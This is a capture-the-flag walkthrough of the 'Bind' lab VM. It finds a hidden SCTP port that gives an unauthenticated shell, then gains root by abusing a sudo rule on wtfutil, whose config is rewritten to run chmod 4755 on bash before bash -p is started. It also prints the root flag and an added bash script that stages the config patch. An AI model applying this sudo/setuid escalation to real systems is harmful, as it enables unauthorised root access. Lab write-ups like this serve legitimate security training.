# Lab Setup
Download: Bind
NAT, IP: 192.168.1.154
# Penetration Process
# Initial Information Gathering
```text
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey:
|   256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA)
|_  256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519)
80/tcp   open  http    Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Apache2 Debian Default Page: It works
8080/tcp open  http    Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: Apache2 Debian Default Page: It works
|_http-open-proxy: Proxy might be redirecting requests
```
Ports 80 and 8080 serve only the Apache default page, and directory enumeration finds nothing on either. The "stream" and "transmission" hints point at SCTP (Stream Control Transmission Protocol): a default nmap scan covers TCP only, so an SCTP service stays invisible until you rescan with the SCTP INIT scan (-sY).
Scan:
```text
┌──(root㉿kali)-[~]
└─# nmap -p- -sY -A 192.168.1.154
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 07:46 EDT
Nmap scan report for 192.168.1.154
Host is up (0.00049s latency).
Not shown: 65534 closed sctp ports (abort)
PORT      STATE SERVICE    VERSION
4444/sctp open  tcpwrapped
MAC Address: 00:0C:29:76:4C:03 (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
```
Service detection only reports 4444/sctp as "tcpwrapped", so connect to it by hand with ncat in SCTP mode (--sctp). The port hands out a shell as ariel with no authentication:
```text
┌──(root㉿kali)-[~]
└─# ncat 192.168.1.154 4444 --sctp
id
uid=1000(ariel) gid=1000(ariel) grupos=1000(ariel)
```
# Privilege Escalation
`sudo -l` shows that ariel may run /usr/bin/wtfutil as root. wtfutil is a terminal dashboard whose cmdrunner modules execute whatever `cmd` and `args` the config file specifies, and the config file is owned by the invoking user, so a sudo rule on it is effectively a sudo rule on any command.
On first run it writes a default config to ~/.config/wtf/config.yml (the same file the sudo command below loads). The default uptime module runs `uptime`; replace its `args` and `cmd` on lines 92 and 93 with a chmod that sets the setuid bit on bash:
```yaml
91     uptime:
92       args: ["4755","/usr/bin/bash"]
93       cmd: "chmod"
94       enabled: true
```
Run wtfutil under sudo so the module executes chmod as root, then start the now setuid-root bash with -p (without -p, bash drops the effective UID back to the real UID on startup, which would throw the privilege away):
```text
ariel@bind:~/.config/wtf$ sudo -u root /usr/bin/wtfutil --config=config.yml
ariel@bind:~$ /usr/bin/bash -p
bash-5.2# cat /root/root.txt
13d5ccd7048766f1e90a08154143939a
```
That gives a root shell and the root flag.
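The escalation above, staged as a script, is an added example and not part of the original writeup. It edits the cmdrunner module in a *copy* of a wtfutil config rather than touching the live file, confirms that only the intended module's `cmd`/`args` changed (so the payload does not land in the wrong block and wtfutil still parses the file), and then checks the setuid bit that `bash -p` depends on. The config excerpt is constructed and modelled on the default uptime module; the paths are temporary files, and the chmod is applied to a stand-in file so the check runs without root.

```bash
#!/usr/bin/env bash
# Added example, not from the original writeup: stage the wtfutil cmdrunner
# payload in a copy of the config and verify the setuid bit that "bash -p"
# relies on. All paths are constructed for the demo; on the target the file
# is ~/.config/wtf/config.yml and wtfutil is launched with sudo.
set -eu

# Constructed excerpt modelled on the default "uptime" cmdrunner module.
make_sample_config() {
  cat > "$1" <<'EOF'
wtf:
  mods:
    uptime:
      args: [""]
      cmd: "uptime"
      enabled: true
      position:
        top: 0
        left: 0
        height: 1
        width: 1
      refreshInterval: 30s
      title: "Uptime"
      type: cmdrunner
EOF
}

# Rewrite cmd: and args: inside one module block only.
# $1 config path, $2 module name (4-space indent under mods:), $3 command,
# $4 args as a YAML flow list, e.g. '["4755","/usr/bin/bash"]'.
patch_cmdrunner() {
  local cfg=$1 mod=$2 cmd=$3 args=$4
  awk -v mod="$mod" -v cmd="$cmd" -v args="$args" '
    $0 ~ ("^    " mod ": *$")     { inblock = 1; print; next }
    inblock && $0 !~ /^      /    { inblock = 0 }   # back at module level
    inblock && /^      cmd:/      { print "      cmd: \"" cmd "\""; next }
    inblock && /^      args:/     { print "      args: " args; next }
                                  { print }
  ' "$cfg" > "$cfg.tmp" && mv "$cfg.tmp" "$cfg"
}

# Print the cmd: value of a module, to check the patch landed where intended.
module_cmd() {
  awk -v mod="$2" '
    $0 ~ ("^    " mod ": *$")   { inblock = 1; next }
    inblock && $0 !~ /^      /  { inblock = 0 }
    inblock && /^      cmd:/    { sub(/^      cmd: */, ""); gsub(/"/, ""); print; exit }
  ' "$1"
}

# chmod 4755 sets the setuid bit; bash -p only keeps root if the bit is
# present and the file is owned by root.
is_setuid()  { [ -u "$1" ]; }
owner_uid()  { stat -c %u "$1" 2>/dev/null || stat -f %u "$1"; }

demo() {
  local d; d=$(mktemp -d)
  make_sample_config "$d/config.yml"
  patch_cmdrunner "$d/config.yml" uptime chmod '["4755","/usr/bin/bash"]'
  echo "uptime module now runs: $(module_cmd "$d/config.yml" uptime)"
  # Stand-in for /usr/bin/bash so the permission check runs without root.
  : > "$d/bash"; chmod 4755 "$d/bash"
  if is_setuid "$d/bash"; then
    echo "setuid bit set (owner uid $(owner_uid "$d/bash"))"
  fi
  rm -rf "$d"
}
demo
```

On the target, the same `patch_cmdrunner` call against ~/.config/wtf/config.yml followed by `sudo -u root /usr/bin/wtfutil --config=config.yml` reproduces the writeup; `is_setuid /usr/bin/bash` then tells you whether `bash -p` will actually yield root before you try it.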